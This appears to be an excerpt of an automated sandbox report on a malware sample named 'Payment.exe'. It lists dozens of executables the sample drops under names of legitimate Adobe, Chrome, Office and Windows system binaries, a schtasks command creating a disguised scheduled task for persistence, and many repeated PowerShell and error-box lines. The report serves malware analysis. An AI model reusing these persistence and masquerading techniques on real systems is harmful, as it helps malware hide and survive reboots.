                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\AgentService.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\SgrmBroker.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\AgentService.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\SgrmBroker.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\vds.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\sppsvc.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Users\user\Desktop\Payment.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp18CE.tmp"
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_02E6CBD0 StrStrIW,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,StartServiceW,8_2_02E6CBD0

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\System32\TieringEngineService.exeFile created: C:\System Volume Information\Heat\
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
